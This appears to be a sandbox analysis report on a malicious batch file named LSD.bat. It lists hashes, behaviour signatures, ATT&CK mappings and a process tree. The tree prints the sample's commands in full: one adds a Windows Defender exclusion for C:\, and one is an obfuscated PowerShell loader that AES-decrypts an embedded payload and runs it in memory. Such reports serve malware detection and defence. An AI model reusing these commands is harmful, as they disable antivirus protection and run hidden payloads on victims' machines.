29fed046e6cb8a389667d00e1762e2dd76cdc2447fb8eeeb1384f16a3840864c

General

Target

LSD.bat
Size

1.3MB
MD5

a9550f1c944a4bce9df986467e8c8065
SHA1

da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3
SHA256

b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529
SHA512

fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca
SSDEEP

24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2772	powershell.exe

Deletes itself 1 IoCs

pid	Process
2976	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2544	LSD.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
2976	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2772	powershell.exe
2544	LSD.bat.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2544	LSD.bat.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 3052	2976	cmd.exe	31
PID 2976 wrote to memory of 3052	2976	cmd.exe	31
PID 2976 wrote to memory of 3052	2976	cmd.exe	31
PID 3052 wrote to memory of 2184	3052	net.exe	32
PID 3052 wrote to memory of 2184	3052	net.exe	32
PID 3052 wrote to memory of 2184	3052	net.exe	32
PID 2976 wrote to memory of 2668	2976	cmd.exe	33
PID 2976 wrote to memory of 2668	2976	cmd.exe	33
PID 2976 wrote to memory of 2668	2976	cmd.exe	33
PID 2976 wrote to memory of 2760	2976	cmd.exe	34
PID 2976 wrote to memory of 2760	2976	cmd.exe	34
PID 2976 wrote to memory of 2760	2976	cmd.exe	34
PID 2976 wrote to memory of 2772	2976	cmd.exe	35
PID 2976 wrote to memory of 2772	2976	cmd.exe	35
PID 2976 wrote to memory of 2772	2976	cmd.exe	35
PID 2976 wrote to memory of 2544	2976	cmd.exe	36
PID 2976 wrote to memory of 2544	2976	cmd.exe	36
PID 2976 wrote to memory of 2544	2976	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"
1⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
  2⤵
  PID:2668
- C:\Windows\system32\findstr.exe
  findstr /C:"" blacklist.txt
  2⤵
  PID:2760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe
  "LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\LSD.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2544-15-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2544-16-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

Filesize
32KB

Download
memory/2772-4-0x000007FEF618E000-0x000007FEF618F000-memory.dmp

Filesize
4KB

Download
memory/2772-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download
memory/2772-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2772-8-0x0000000002E3B000-0x0000000002EA2000-memory.dmp

Filesize
412KB

Download
memory/2772-7-0x0000000002E34000-0x0000000002E37000-memory.dmp

Filesize
12KB

Download
memory/2772-9-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download
memory/2772-17-0x000007FEF5ED0000-0x000007FEF686D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing